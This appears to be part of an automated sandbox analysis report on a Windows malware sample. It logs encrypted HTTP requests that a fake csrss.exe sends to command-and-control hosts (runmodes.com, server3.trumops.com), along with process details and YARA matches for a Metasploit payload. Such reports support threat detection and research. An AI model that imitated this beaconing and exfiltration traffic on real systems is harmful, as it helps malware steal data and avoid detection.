                                                                                                                              2021-11-11 19:35:29 UTC20INData Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
                                                                                                                              2021-11-11 19:35:29 UTC21INData Raw: 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a
                                                                                                                              Data Ascii: pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head>
                                                                                                                              2021-11-11 19:35:29 UTC21INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              2192.168.2.349747172.67.207.136443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-11-11 19:35:33 UTC21OUTPOST /api/log HTTP/1.1
                                                                                                                              Host: runmodes.com
                                                                                                                              User-Agent: Go-http-client/1.1
                                                                                                                              Content-Length: 132
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              2021-11-11 19:35:33 UTC21OUTData Raw: 46 34 35 4a 44 49 46 33 48 5a 66 61 47 6a 77 6b 4f 64 73 64 61 43 64 57 63 63 35 6a 59 31 4e 54 48 6d 50 49 5a 63 73 49 4b 4a 76 4f 6b 56 4e 53 53 7a 31 7a 63 42 55 4e 65 2f 42 45 4d 71 74 6c 68 74 52 6c 4f 66 77 4d 46 58 65 2f 4e 36 71 46 48 4e 34 7a 55 45 58 33 44 52 6e 2f 73 69 68 4e 5a 36 53 4a 63 2b 75 67 58 48 46 49 46 30 78 79 6b 69 55 7a 4b 73 55 43 55 4d 65 4c 37 32 31 4d 68 41 3d 3d
                                                                                                                              Data Ascii: F45JDIF3HZfaGjwkOdsdaCdWcc5jY1NTHmPIZcsIKJvOkVNSSz1zcBUNe/BEMqtlhtRlOfwMFXe/N6qFHN4zUEX3DRn/sihNZ6SJc+ugXHFIF0xykiUzKsUCUMeL721MhA==
                                                                                                                              2021-11-11 19:35:33 UTC21INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 11 Nov 2021 19:35:33 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZEskwX9w7lpIdtUinZcRTY2QBVMlj0LlEZoohy2rXUMZio1KTGEsvMVYERsP%2FzlgrMq9vnazyYmJottu%2FLejMPKToc761NwJhDbADc3f1Zv%2BmmEAeljPBmebOneq1B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f6e1bc974a56-FRA
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              3192.168.2.349748172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-11-11 19:35:37 UTC22OUTPOST /api/poll HTTP/1.1
                                                                                                                              Host: server3.trumops.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/80.0.3987.87 Chrome/80.0.3987.87 Safari/537.36
                                                                                                                              Content-Length: 652
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              2021-11-11 19:35:37 UTC22OUTData Raw: 54 62 76 34 72 34 69 6e 5a 73 78 47 66 61 41 52 57 6f 70 4b 2f 4b 4a 44 6d 62 49 66 34 35 7a 75 42 69 4c 34 52 78 6c 78 42 50 72 2f 4b 50 78 56 74 62 38 4e 68 34 75 73 65 50 75 68 32 48 2f 78 45 35 69 70 62 7a 56 4a 47 58 6d 69 53 56 75 4b 67 6d 71 7a 78 6f 4d 59 34 30 55 76 2f 4e 65 41 64 38 79 67 51 46 76 71 39 63 2b 57 5a 46 70 36 71 31 6f 6f 55 36 48 6a 44 73 2f 75 75 4f 68 78 57 31 77 4c 6c 48 4f 6a 31 54 57 35 6e 79 67 67 70 55 48 5a 55 31 44 4e 6a 68 36 78 35 36 69 39 2b 6e 6e 48 5a 70 59 6f 7a 79 6f 74 6e 53 65 78 4f 76 79 46 48 2f 72 39 6b 67 51 57 64 65 71 49 73 66 63 6f 4d 6d 47 6b 2b 58 76 66 65 6b 45 36 45 44 46 59 75 50 45 6a 38 47 56 39 36 31 43 6c 6b 6a 70 59 55 67 31 41 78 35 54 75 73 33 6f 37 51 5a 46 6e 57 51 6a 51 4b 77 72 70 42 4c 69
                                                                                                                              Data Ascii: Tbv4r4inZsxGfaARWopK/KJDmbIf45zuBiL4RxlxBPr/KPxVtb8Nh4usePuh2H/xE5ipbzVJGXmiSVuKgmqzxoMY40Uv/NeAd8ygQFvq9c+WZFp6q1ooU6HjDs/uuOhxW1wLlHOj1TW5nyggpUHZU1DNjh6x56i9+nnHZpYozyotnSexOvyFH/r9kgQWdeqIsfcoMmGk+XvfekE6EDFYuPEj8GV961ClkjpYUg1Ax5Tus3o7QZFnWQjQKwrpBLi
                                                                                                                              2021-11-11 19:35:37 UTC23INHTTP/1.1 404 Not Found
                                                                                                                              Date: Thu, 11 Nov 2021 19:35:37 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/8.0.11
                                                                                                                              set-cookie: PHPSESSID=4vldu1scrrpcspdhkuu3ka9fnh; path=/; HttpOnly
                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                              pragma: no-cache
                                                                                                                              access-control-allow-credentials: false
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w%2FSRTvKYrEtJCgQJudOl4mEoCl42VZ21LylxF13UV71mdnMd%2Faol5Yp5pxSj%2BswODdLCYMP3eIVPFa9sl85XFuj0UouYrZCuOS%2F8WKEjt3rSe9oezdyQjMbllAbT3Q1v10BSBKd1"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f6fbaafd743b-LHR
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                              2021-11-11 19:35:37 UTC24INData Raw: 65 38 0d 0a 44 69 36 48 71 72 58 64 45 49 51 47 67 4e 6b 78 65 78 67 52 72 42 6e 59 34 73 62 61 39 51 63 6d 4b 62 38 62 50 34 41 62 2f 58 51 46 72 53 62 42 70 31 35 6a 66 38 33 45 6c 30 32 37 5a 56 2b 50 69 41 66 76 53 33 76 33 58 54 41 38 46 51 62 48 43 4a 34 43 2f 36 35 64 75 70 77 56 56 75 71 59 75 6d 7a 76 6f 30 72 71 4e 33 6a 4a 69 5a 75 69 6b 71 70 6a 49 44 4f 48 73 35 34 39 6f 64 52 55 42 62 66 79 61 32 79 69 79 59 69 64 68 45 2b 4a 54 38 4e 44 37 37 74 41 34 62 37 57 37 31 6f 73 56 37 77 42 69 54 6b 50 6d 45 52 58 33 51 72 2f 57 78 6e 38 54 73 6d 38 72 4b 42 48 45 4b 38 56 4d 42 2b 7a 47 32 33 6b 4a 77 55 51 63 47 32 7a 58 46 46 53 73 51 2b 45 6a 45 51 75 69 53 58 30 48 57 48 31 42 41 3d 3d 0d 0a
                                                                                                                              Data Ascii: e8Di6HqrXdEIQGgNkxexgRrBnY4sba9QcmKb8bP4Ab/XQFrSbBp15jf83El027ZV+PiAfvS3v3XTA8FQbHCJ4C/65dupwVVuqYumzvo0rqN3jJiZuikqpjIDOHs549odRUBbfya2yiyYidhE+JT8ND77tA4b7W71osV7wBiTkPmERX3Qr/Wxn8Tsm8rKBHEK8VMB+zG23kJwUQcG2zXFFSsQ+EjEQuiSX0HWH1BA==
                                                                                                                              2021-11-11 19:35:37 UTC24INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              4192.168.2.349750172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-11-11 19:35:48 UTC24OUTGET /api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f HTTP/1.1
                                                                                                                              Host: server3.trumops.com
                                                                                                                              User-Agent: Go-http-client/1.1
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              2021-11-11 19:35:48 UTC24INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 11 Nov 2021 19:35:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/8.0.11
                                                                                                                              access-control-allow-credentials: false
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ra3la1xuXXEo%2FuoQ5xW08lov9CYIHIgkFznsILZRTF0zyCBqtkm82UvTJIGEd40REf4yx3am4JXzxBdzXpZoxM6O%2BRJef9Ud49kcxesyLDYfXADn%2BVKcAq8GBnVrt1XjBPfH3JAF"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f7424d5774c9-LHR
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                              2021-11-11 19:35:48 UTC25INData Raw: 31 33 34 0d 0a 31 37 61 70 69 55 74 4d 55 70 41 72 57 4c 66 70 51 49 65 2b 54 66 76 43 6b 59 55 51 6a 51 77 30 49 6f 77 53 48 36 37 68 53 5a 55 66 4e 76 4e 35 38 69 43 70 61 6b 2f 4a 34 45 6f 6a 6b 2f 49 32 57 6d 4b 59 61 58 31 76 2b 39 36 34 42 78 65 66 59 2f 34 63 76 4c 32 35 73 57 42 69 43 35 63 31 42 66 5a 67 69 48 73 39 39 44 73 78 6b 31 34 37 75 54 69 50 55 59 74 6f 67 52 62 51 35 79 72 54 7a 37 6e 6c 6c 31 41 65 4b 31 65 74 66 4e 4a 69 79 43 37 62 58 55 69 5a 78 41 39 49 4e 72 43 52 71 46 53 33 47 65 53 35 57 36 47 35 42 31 37 33 74 68 6e 6d 32 75 4c 6b 42 45 61 56 45 75 50 6c 6c 6e 6c 37 72 57 43 51 35 50 55 63 34 55 4e 4a 55 46 31 31 51 39 67 51 6b 79 51 6f 32 50 32 4b 74 6c 6d 58 32 67 4a 30 32 37 4d 7a 47 65 52 62 58 2f 47 57 6a 42 61 69 4d 35
                                                                                                                              Data Ascii: 13417apiUtMUpArWLfpQIe+TfvCkYUQjQw0IowSH67hSZUfNvN58iCpak/J4Eojk/I2WmKYaX1v+964BxefY/4cvL25sWBiC5c1BfZgiHs99Dsxk147uTiPUYtogRbQ5yrTz7nll1AeK1etfNJiyC7bXUiZxA9INrCRqFS3GeS5W6G5B173thnm2uLkBEaVEuPllnl7rWCQ5PUc4UNJUF11Q9gQkyQo2P2KtlmX2gJ027MzGeRbX/GWjBaiM5
                                                                                                                              2021-11-11 19:35:48 UTC25INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              5192.168.2.349752104.21.34.203443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-11-11 19:36:01 UTC26OUTPOST /api/log HTTP/1.1
                                                                                                                              Host: runmodes.com
                                                                                                                              User-Agent: Go-http-client/1.1
                                                                                                                              Content-Length: 160
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              2021-11-11 19:36:01 UTC26OUTData Raw: 78 4c 46 5a 6e 76 56 59 34 74 58 46 52 52 61 48 5a 47 57 74 4f 62 6f 6b 59 4f 38 7a 72 43 2f 39 7a 64 36 32 76 58 4d 67 67 66 42 6c 44 31 4e 50 67 6d 77 74 54 74 69 2b 52 47 52 49 32 76 59 66 64 4c 67 64 6b 79 6e 39 4b 74 56 41 41 45 55 31 65 49 73 67 76 6f 44 37 63 50 78 6e 30 34 35 64 6b 67 33 52 6e 7a 33 34 37 58 54 78 33 30 57 41 55 65 78 75 59 30 58 50 63 70 2b 69 53 56 6a 36 52 2f 48 4e 54 51 6e 79 7a 67 63 48 64 6c 65 6f 75 4d 38 2f 55 52 66 65 46 5a 2b 44 32 41 3d 3d
                                                                                                                              Data Ascii: xLFZnvVY4tXFRRaHZGWtObokYO8zrC/9zd62vXMggfBlD1NPgmwtTti+RGRI2vYfdLgdkyn9KtVAAEU1eIsgvoD7cPxn045dkg3Rnz347XTx30WAUexuY0XPcp+iSVj6R/HNTQnyzgcHdleouM8/URfeFZ+D2A==
                                                                                                                              2021-11-11 19:36:01 UTC26INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 11 Nov 2021 19:36:01 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ozqruw9MhSRxrKEYpqNqPeNGKGC8GczYkELhwjMv0q7xdNPQ%2BC%2BUA4ZnIu%2BKaHLqBQAYAv0U8dximvU0qPkJ%2FextS9G5I0DQ2U5HSyqq9J2IshwJiuW%2FBi99PUKn0dM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f791181b2b29-FRA
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              6192.168.2.349807172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2021-11-11 19:37:02 UTC27OUTPOST /api/poll HTTP/1.1
                                                                                                                              Host: server3.trumops.com
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
                                                                                                                              Content-Length: 668
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              2021-11-11 19:37:02 UTC27OUTData Raw: 78 42 69 48 2b 52 6f 2f 58 74 4e 39 4e 61 35 69 42 43 68 51 73 62 61 34 59 62 79 55 72 39 31 6f 61 69 75 6b 57 47 6b 49 33 58 72 75 4c 63 52 36 5a 56 78 71 2b 35 6a 47 31 42 66 38 4e 4c 39 45 55 32 4d 62 66 72 77 35 39 52 64 6a 35 51 4f 54 47 6c 71 75 77 72 53 45 75 57 68 6e 30 57 69 41 57 70 48 34 30 56 67 38 53 70 2b 64 66 57 34 31 44 61 2f 51 6b 71 56 67 74 58 63 52 30 30 58 4c 34 55 53 44 71 4a 4c 55 77 48 38 59 6a 2b 39 75 44 48 7a 45 55 35 6b 51 50 63 4f 51 64 45 75 62 73 4b 75 6e 50 47 61 30 54 78 44 49 45 51 6a 49 35 35 7a 51 76 7a 6b 47 72 63 4b 67 4f 4b 6f 36 4c 72 76 59 56 6f 66 39 61 62 77 55 31 38 35 79 32 49 2f 62 2f 45 69 65 63 2b 31 6e 36 73 45 56 61 6c 77 34 6b 76 71 5a 4a 6f 33 51 78 46 2b 6d 51 39 36 35 4b 45 77 70 38 46 32 4b 75 38 46
                                                                                                                              Data Ascii: xBiH+Ro/XtN9Na5iBChQsba4YbyUr91oaiukWGkI3XruLcR6ZVxq+5jG1Bf8NL9EU2Mbfrw59Rdj5QOTGlquwrSEuWhn0WiAWpH40Vg8Sp+dfW41Da/QkqVgtXcR00XL4USDqJLUwH8Yj+9uDHzEU5kQPcOQdEubsKunPGa0TxDIEQjI55zQvzkGrcKgOKo6LrvYVof9abwU185y2I/b/Eiec+1n6sEValw4kvqZJo3QxF+mQ965KEwp8F2Ku8F
                                                                                                                              2021-11-11 19:37:02 UTC27INHTTP/1.1 404 Not Found
                                                                                                                              Date: Thu, 11 Nov 2021 19:37:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/8.0.11
                                                                                                                              set-cookie: PHPSESSID=6afjhtvjo4rm2efnl9dt7t1rk1; path=/; HttpOnly
                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                              pragma: no-cache
                                                                                                                              access-control-allow-credentials: false
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YMbRGgJ2bGzGIGIXFb6v9e0wG%2BKBDHlgxtgTlLO5TOltDXIejwxR2ouZvDu5%2Fv1UgpfK778TuEaeYtjU0gQYezCTHP9oV9kTVjAZlULy%2BV9gDKFrggPJhGhvlZQtlD%2FEDY7zfduX"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 6ac9f90c5a1b779d-LHR
                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                              2021-11-11 19:37:02 UTC28INData Raw: 65 38 0d 0a 6a 2f 77 61 64 2b 4b 71 34 51 4c 32 46 4c 4b 31 47 68 65 36 62 66 31 37 76 39 48 5a 58 62 75 43 7a 75 31 61 79 4b 6d 38 56 41 4c 68 5a 30 36 65 46 31 67 61 62 32 59 7a 37 2b 49 66 6f 63 50 2f 4d 6a 32 4f 32 49 59 35 34 59 69 79 31 70 32 74 44 48 75 64 55 2b 4d 4f 73 51 78 65 71 6c 71 4b 68 75 64 4e 6a 41 53 47 36 69 65 37 33 74 65 4e 39 75 49 4b 37 65 43 73 37 7a 2f 32 51 61 50 68 6d 53 4f 69 32 6d 4d 38 2b 32 53 34 79 77 51 47 53 55 6a 62 66 52 76 50 51 6d 48 41 63 64 57 75 67 31 2b 63 6d 62 4d 65 6a 36 41 77 4f 47 38 63 53 38 50 64 6d 68 66 2b 62 67 74 79 63 37 63 66 78 36 4a 69 43 48 4d 56 4c 58 32 58 49 64 6c 64 54 6e 42 55 73 66 4a 53 76 51 45 76 69 38 65 6d 48 6c 55 47 62 41 3d 3d 0d 0a
                                                                                                                              Data Ascii: e8j/wad+Kq4QL2FLK1Ghe6bf17v9HZXbuCzu1ayKm8VALhZ06eF1gab2Yz7+IfocP/Mj2O2IY54Yiy1p2tDHudU+MOsQxeqlqKhudNjASG6ie73teN9uIK7eCs7z/2QaPhmSOi2mM8+2S4ywQGSUjbfRvPQmHAcdWug1+cmbMej6AwOG8cS8Pdmhf+bgtyc7cfx6JiCHMVLX2XIdldTnBUsfJSvQEvi8emHlUGbA==
                                                                                                                              2021-11-11 19:37:02 UTC29INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Start time:20:35:00
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Users\user\Desktop\1dyvctHqv1.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\1dyvctHqv1.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:20:35:03
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:03
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:04
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:05
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:06
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:07
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                              Imagebase:0x7ff73bc70000
                                                                                                                              File size:163336 bytes
                                                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:08
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              Imagebase:0x7ff6a2fb0000
                                                                                                                              File size:131584 bytes
                                                                                                                              MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:20:35:08
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:08
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Users\user\Desktop\1dyvctHqv1.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\1dyvctHqv1.exe
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
